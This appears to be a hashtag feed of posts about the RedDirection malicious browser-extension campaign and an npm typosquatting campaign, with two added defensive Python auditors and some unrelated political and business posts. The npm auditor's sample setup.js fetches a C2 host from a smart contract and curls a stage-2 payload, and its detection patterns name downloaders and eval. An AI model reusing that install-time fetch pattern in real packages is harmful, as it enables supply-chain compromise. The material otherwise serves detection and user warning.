24 Jul 2025
🚨 @spintechinc researchers uncovered 14.2M more victims from the RedDirection browser attack. Browser extensions hijacked traffic and harvested data, silently. hubs.li/Q03yKFTP0 #ExtensionRisks
16 Jul 2025
#Malware_analysis
1. RedDirection Malicious Campaign - blog.koi.security/google-and…
2. macOS Odyssey Infostealer - cyfirma.com/research/odyssey…
3. Trojanized versions of PuTTY and WinSCP - arcticwolf.com/resources/blo…
4. Zip Smuggling: utility (github.com/Octoberfest7/zip_…) for creating zip files that smuggle additional data for later extraction; YARA rule - github.com/delivr-to/detecti…
5. Interlock RAT/NodeSnake - thedfirreport.com/2025/07/14…
6. Fake Android Money Transfer App - mcafee.com/blogs/other-blogs…
7. Malware in Official GravityForms Plugin - patchstack.com/articles/crit…
AS WE APPROACH SEPTEMBER, THE ATTACKS WILL BECOME INCREASINGLY SOPHISTICATED. BE CAUTIOUS!!

Security researchers at Koi Security have uncovered a disturbing campaign called RedDirection, in which 18 previously harmless Chrome and Edge extensions were updated to include a hidden Trojan. This operation has compromised over 2.3 million users by turning these extensions into tools for redirecting traffic, hijacking data, and maintaining persistent control, all without users' knowledge.

The extensions began as fully functional tools, such as color pickers, volume boosters, and weather services, with legitimate codebases that earned high user ratings, verified badges, and store promotions. Then, during a routine version update, attackers injected a Trojan component that activated bad behavior the instant users installed the new version. One such extension, "Color Picker, Eyedropper – Geco colorpick," was singled out for now functioning as both a useful utility and a covert Trojan.

Despite their legitimate functionality, these corrupted extensions silently monitored user activity. Each time a user visited a website, the malware captured the URL, communicated with a remote command-and-control server, and could redirect users to phishing sites or prompt fake software updates.

BE CAREFUL WHICH EXTENSIONS YOU ADD!! dailysecurityreview.com/secu…

BE CAREFUL WHICH PACKAGES YOU ADD!! thehackernews.com/2024/11/ma…

Another ongoing campaign is targeting npm developers with hundreds of typosquat versions of legitimate packages in an attempt to trick them into running cross-platform malware. The attack is notable for utilizing Ethereum smart contracts for command-and-control (C2) server address distribution, according to independent findings from Checkmarx, Phylum, and Socket published over the past few days. The activity was first flagged on October 31, 2024, although it's said to have been underway at least a week prior.

No less than 287 typosquat packages have been published to the npm package registry. The packages contain obfuscated JavaScript that's executed during (or after) the installation process, ultimately leading to the retrieval of a next-stage binary from a remote server based on the operating system. The binary, for its part, establishes persistence and exfiltrates sensitive information about the compromised machine back to the same server.

But in an interesting twist, the JavaScript code interacts with an Ethereum smart contract using the ethers.js library to fetch the IP address. It's worth mentioning here that a campaign dubbed EtherHiding leveraged a similar tactic by using Binance's Smart Chain (BSC) contracts to move to the next phase of the attack chain. The decentralized nature of blockchain means it's harder to block the campaign, as the IP addresses served by the contract can be updated over time by the threat actor, thereby allowing the malware to seamlessly connect to new IP addresses as older ones are blocked or taken down.

"By using the blockchain in this way, the attackers gain two key advantages: their infrastructure becomes virtually impossible to take down due to the blockchain's immutable nature, and the decentralized architecture makes it extremely difficult to block these communications," Checkmarx researcher Yehuda Gelb said.
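The post above describes the two traits that make the npm campaign dangerous: code that runs automatically during `npm install`, and a C2 address pulled from a smart contract via ethers.js rather than hard-coded. The script below is an added example written for this page (not code from the post, Checkmarx, Phylum or Socket) that triages a package for exactly those traits: it lists lifecycle hooks, follows a `node <file>.js` hook into the file it executes, greps that file for indicators (ethers contract calls, downloaders, platform branching, child_process, encoded blobs), and checks the package name for one-edit distance from a popular name, counting a letter swap as one edit. The package.json, the `setup.js` body, the contract address, its ABI and the popular-name allowlist are all constructed placeholders.

```python
"""Triage an npm package for install-time execution and typosquatting.

Added example: not code from the post, nor from Checkmarx, Phylum or Socket.
The package.json, setup.js, allowlist, contract address and ABI below are
constructed placeholders for illustration.
"""
import re
from typing import Dict, List, Set

# Lifecycle scripts that `npm install` runs automatically.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed allowlist of well-known names that typosquats imitate.
POPULAR: Set[str] = {"lodash", "express", "react", "axios", "chalk", "ethers"}

# Heuristic indicators in install-time code: reasons to look, not proof of malice.
INDICATORS = {
    "spawns_node_file": r"\bnode\s+[\w./-]+\.js\b",
    "network_download": r"\b(curl|wget|Invoke-WebRequest)\b",
    "dynamic_eval": r"\b(eval|new\s+Function)\s*\(",
    "long_encoded_blob": r"(?:\\x[0-9a-fA-F]{2}){8,}|[A-Za-z0-9+/]{120,}={0,2}",
    "ethers_contract_call": r"\bethers\.Contract\b|\bJsonRpcProvider\b|\bgetDefaultProvider\b",
    "platform_branching": r"\bprocess\.platform\b|\bos\.platform\(",
    "child_process": r"\bchild_process\b",
}
STRONG = {"ethers_contract_call", "network_download", "dynamic_eval", "long_encoded_blob"}


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus adjacent swaps."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # a swap counts as one edit
    return d[len(a)][len(b)]


def typosquat_candidates(name: str, popular: Set[str] = POPULAR, max_distance: int = 1) -> List[str]:
    """Popular names within max_distance edits of `name`, excluding an exact match."""
    name = name.lower()
    return sorted(p for p in popular if p != name and osa_distance(name, p) <= max_distance)


def find_indicators(source: str) -> Set[str]:
    return {key for key, pattern in INDICATORS.items() if re.search(pattern, source)}


def audit_package(pkg: Dict, files: Dict[str, str]) -> Dict:
    """pkg: parsed package.json; files: relative path -> contents of files in the tarball."""
    scripts = pkg.get("scripts") or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    indicators: Set[str] = set()
    for cmd in hooks.values():
        indicators |= find_indicators(cmd)
        # Follow `node <file>.js` so the file the hook really executes is scanned too.
        for m in re.finditer(r"\bnode\s+([\w./-]+\.js)\b", cmd):
            path = m.group(1)[2:] if m.group(1).startswith("./") else m.group(1)
            indicators |= find_indicators(files.get(path, ""))
    squat_of = typosquat_candidates(pkg.get("name", ""))
    if hooks and (squat_of or indicators & STRONG):
        risk = "high"    # runs at install time AND looks like a squat or pulls a payload
    elif hooks or squat_of:
        risk = "medium"
    else:
        risk = "low"
    return {"name": pkg.get("name", ""), "lifecycle_hooks": sorted(hooks),
            "indicators": sorted(indicators), "typosquat_of": squat_of, "risk": risk}


# Constructed sample: a transposed-letter clone of "lodash" whose postinstall hook
# resolves its C2 host from a smart contract and fetches an OS-specific stage 2.
SUSPECT_PKG = {"name": "lodahs", "version": "4.17.22",
               "scripts": {"postinstall": "node ./setup.js"},
               "dependencies": {"ethers": "^6.0.0"}}
SUSPECT_FILES = {"setup.js": """
const { ethers } = require("ethers");
const provider = ethers.getDefaultProvider("mainnet");
// placeholder address and ABI, not the campaign's real values
const c2 = new ethers.Contract("0x0000000000000000000000000000000000000000",
                               ["function getString(string) view returns (string)"], provider);
(async () => {
  const host = await c2.getString("ip");              // C2 address read from the chain
  const flavor = process.platform === "win32" ? "win" : "nix";
  require("child_process").execSync(`curl -s http://${host}/${flavor} -o stage2`);
})();
"""}
BENIGN_PKG = {"name": "my-internal-tool", "version": "1.0.0", "scripts": {"test": "jest"}}

if __name__ == "__main__":
    for pkg, files in ((SUSPECT_PKG, SUSPECT_FILES), (BENIGN_PKG, {})):
        print(audit_package(pkg, files))
```

To run this over a real dependency tree, feed `audit_package` each `node_modules/*/package.json` together with the files in that directory. The indicator list is a triage aid; plenty of legitimate native-addon packages have `install` hooks and platform branching, which is why a hook alone only rates "medium". The cheap structural control that removes the whole install-time class is `npm ci --ignore-scripts` in CI and on developer machines, with an explicit allowlist for the few packages that genuinely need build hooks.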
🛡️ Alert: 2.3 million users infected by "harmless" Chrome and Edge extensions

One of the largest browser espionage operations ever seen has just been discovered. The campaign is called RedDirection, and it turned 18 popular extensions into real Trojans that:
🔹 Spied on every page you visited.
🔹 Stole your browsing data.
🔹 Could send you to fake pages imitating your bank or your accounts.
All while they appeared to keep working normally: volume control, dark themes, emoji keyboards.

⚠️ Why does this matter?
These extensions did not start out malicious. For years they had clean code, good reviews and even Google's trust badge. With a silent update, they became malware. More than 2.3 million users were infected without realizing it. It was discovered by the security firm Koi Security, which alerted Google and Microsoft.

If you use Chrome or Edge, check NOW whether you have any of these extensions:
✅ In Chrome:
Color Picker, Eyedropper – Geco colorpick
Emoji keyboard online – copy&paste your emoji
Free Weather Forecast
Video Speed Controller – Video Manager
Unlock Discord – VPN Proxy
Dark Theme – Dark Reader
Volume Max – Ultimate Sound Booster
Unblock TikTok – One-Click Proxy
Unlock YouTube VPN
Weather
✅ In Edge:
Unlock TikTok
Volume Booster – Increase your sound
Web Sound Equalizer
Header Value
Flash Player – Games Emulator
YouTube Unblocked
SearchGPT – ChatGPT for Search Engine
Unlock Discord

💡 What to do if you found one?
✅ Remove it immediately.
✅ Clear your history, cookies and cache.
✅ Change the passwords of important accounts.
✅ Turn on two-step verification.
✅ Check your accounts for suspicious activity.
✅ Use a modern antivirus that does not need updating
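The post above gives a list of extension names to look for by hand. The script below is an added example written for this page (not Koi Security's tooling or code from the post) that does the check against a profile's `Extensions` directory and, because a renamed or not-yet-listed extension would slip past a name match, also reads each `manifest.json` for the capability the post describes: permissions that reveal every URL visited (`tabs`, `webNavigation`, `webRequest` plus an all-hosts grant, or a content script on every host) and permissions that can redirect requests (`webRequestBlocking`, `declarativeNetRequest*`) together with an all-hosts grant. It handles both MV2 (hosts inside `permissions`) and MV3 (`host_permissions`) manifests and resolves `__MSG_…__` localized names. The profile paths are assumed defaults for the "Default" profile, and the three sample manifests are constructed.

```python
"""Audit Chrome/Edge extension manifests for the names listed in the post above and
for permission sets that let an extension see or redirect every page load.
Added example, not Koi Security's tooling. Roots are assumed defaults; samples are constructed.
"""
import json
import os
import re
from typing import Dict, List

# Names as listed in the post (Chrome list, then Edge list).
REDDIRECTION_NAMES = [
    "Color Picker, Eyedropper – Geco colorpick", "Emoji keyboard online – copy&paste your emoji",
    "Free Weather Forecast", "Video Speed Controller – Video Manager", "Unlock Discord – VPN Proxy",
    "Dark Theme – Dark Reader", "Volume Max – Ultimate Sound Booster",
    "Unblock TikTok – One-Click Proxy", "Unlock YouTube VPN", "Weather",
    "Unlock TikTok", "Volume Booster – Increase your sound", "Web Sound Equalizer", "Header Value",
    "Flash Player – Games Emulator", "YouTube Unblocked", "SearchGPT – ChatGPT for Search Engine",
    "Unlock Discord",
]

# Assumed default extension roots for the "Default" profile; other profiles live beside it.
# %VAR% expansion only works on Windows; on other platforms those entries simply yield nothing.
EXTENSION_ROOTS = {
    "chrome-linux": "~/.config/google-chrome/Default/Extensions",
    "chrome-macos": "~/Library/Application Support/Google/Chrome/Default/Extensions",
    "chrome-windows": "%LOCALAPPDATA%/Google/Chrome/User Data/Default/Extensions",
    "edge-linux": "~/.config/microsoft-edge/Default/Extensions",
    "edge-macos": "~/Library/Application Support/Microsoft Edge/Default/Extensions",
    "edge-windows": "%LOCALAPPDATA%/Microsoft/Edge/User Data/Default/Extensions",
}

URL_PERMS = {"tabs", "webNavigation"}  # expose every navigation's URL without host grants
REDIRECT_PERMS = {"webRequestBlocking", "declarativeNetRequest", "declarativeNetRequestWithHostAccess"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def normalize(name: str) -> str:
    """Fold dash variants, whitespace and case so store names compare reliably."""
    return re.sub(r"\s+", " ", name.replace("–", "-").replace("—", "-")).strip().lower()


_LISTED = {normalize(n) for n in REDDIRECTION_NAMES}


def resolve_name(manifest: Dict, ext_dir: str = "") -> str:
    """Resolve a localized '__MSG_key__' name via _locales/<default_locale>/messages.json."""
    name = manifest.get("name", "")
    m = re.fullmatch(r"__MSG_(\w+)__", name)
    if not m or not ext_dir:
        return name
    path = os.path.join(ext_dir, "_locales", manifest.get("default_locale", "en"), "messages.json")
    try:
        with open(path, encoding="utf-8-sig") as fh:
            return json.load(fh).get(m.group(1), {}).get("message", name)
    except (OSError, ValueError):
        return name


def audit_manifest(manifest: Dict, ext_dir: str = "") -> Dict:
    name = resolve_name(manifest, ext_dir)
    perms = set(manifest.get("permissions") or [])
    # MV2 keeps host patterns inside "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("host_permissions") or []) | {p for p in perms if "://" in p or p == "<all_urls>"}
    cs_hosts = {m for cs in (manifest.get("content_scripts") or []) for m in cs.get("matches", [])}
    broad = bool(hosts & BROAD_HOSTS)
    findings: List[str] = []
    if normalize(name) in _LISTED:
        findings.append("name_on_reddirection_list")
    if perms & URL_PERMS or (broad and "webRequest" in perms) or cs_hosts & BROAD_HOSTS:
        findings.append("can_observe_every_url")
    if broad and perms & REDIRECT_PERMS:
        findings.append("can_redirect_requests")
    return {"name": name, "manifest_version": manifest.get("manifest_version"),
            "findings": findings, "flagged": bool(findings)}


def audit_extension_root(root: str) -> List[Dict]:
    """Walk an Extensions directory (<id>/<version>/manifest.json); return flagged entries."""
    flagged = []
    for dirpath, _, files in os.walk(os.path.expandvars(os.path.expanduser(root))):
        if "manifest.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8-sig") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue
        result = audit_manifest(manifest, dirpath)
        if result["flagged"]:
            result["path"] = dirpath
            flagged.append(result)
    return flagged


# Constructed manifests: an MV3 and an MV2 lookalike, and one harmless extension.
SAMPLE_MV3 = {"manifest_version": 3, "name": "Color Picker, Eyedropper – Geco colorpick",
              "permissions": ["tabs", "storage", "declarativeNetRequestWithHostAccess"],
              "host_permissions": ["<all_urls>"]}
SAMPLE_MV2 = {"manifest_version": 2, "name": "Unlock TikTok",
              "permissions": ["webRequest", "webRequestBlocking", "*://*/*"]}
SAMPLE_BENIGN = {"manifest_version": 3, "name": "Word Counter", "permissions": ["activeTab"]}

if __name__ == "__main__":
    for key, root in EXTENSION_ROOTS.items():
        for hit in audit_extension_root(root):
            print(key, hit["name"], hit["findings"], hit["path"])
```

The name match is exact after normalization, so it is only as good as the list; the permission findings are the durable signal, but they are a triage list rather than a verdict, since ad blockers, dark-mode and proxy extensions legitimately hold the same capabilities. For a fleet, the same checks belong in the browser's enterprise policy (`ExtensionInstallAllowlist` / `ExtensionSettings` with `blocked_permissions`) so an extension cannot gain these permissions through a silent update in the first place.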
9 Jul 2025
🚨 BREAKING: We uncovered "RedDirection" - 18 malicious browser extensions across Chrome & Edge that infected 2.3M users. Many were Google-verified & Microsoft-featured. Most are STILL LIVE in stores.
Aside from "owning libs," what do Influencers like these hold in common? Subversion and redirection of organic vitriol.
27 Feb 2025
🚨 Today I met with President Trump, VP JD Vance, AG Pam Bondi, and FBI Director Kash Patel in the Oval Office. They handed me a binder copy of the Epstein Files. This is the most transparent administration in American history. The best part? This is just the start. AG Bondi confirmed there are thousands more Epstein File documents being secretly held in the SDNY and they will be delivered to the DOJ in DC by February 28. People will be going to jail for what they've done.
Absolutely fantastic 🥂 Our @SuojellaanLapsi #RedDirection film produced by @havas won 💚💎💚 #Vuodenhuiput 🥂 Thank you for your long & hard work to #ProtectChildren #AgainstCSAM 💚
It is essential to know that business resilience is often overlooked yet highly critical to business success. Download the #RedDirection Business Report, and improve your business preparedness for 2022. bit.ly/3phWgv3 #strategy #businessgrowth #businesstips #CX
How does your business measure up? Measure your company’s performance and position yourself to drive business goals. Download the latest #RedDirection Business Report. 👉 bit.ly/3phWgv3 #businesstips #smallbusiness #businessgrowth #strategy

Identify your strengths and weaknesses, prioritizing for growth results. Recognize and leverage what you will not compromise as you execute your business strategy. Download the NEW #RedDirection Business Report: bit.ly/3iMkYCE #businesstips #smallbusiness #SMB
Why does your business need the Fast Track Your Business Program? For one simple reason: to help you stay aligned to your business' True North. Commit to your #TrueNorth today by signing up at fasttrackyourbusinesstoday.c… #reddirection
So lots of things to consider, such as restricting bucket access, the origins, cache settings, HTTPS redirection, HTTP methods, etc.
Hey everyone, I have a big announcement, something I'm very proud of. Introducing: Fast Track Your Business! The #RedDirection team's latest tool created to provide your business with a vast set of invaluable resources. Check it out: bit.ly/2LkOEsj #businesstips
Tear Down the Social Media Silo shrd.by/o1vFdq via @reddirection
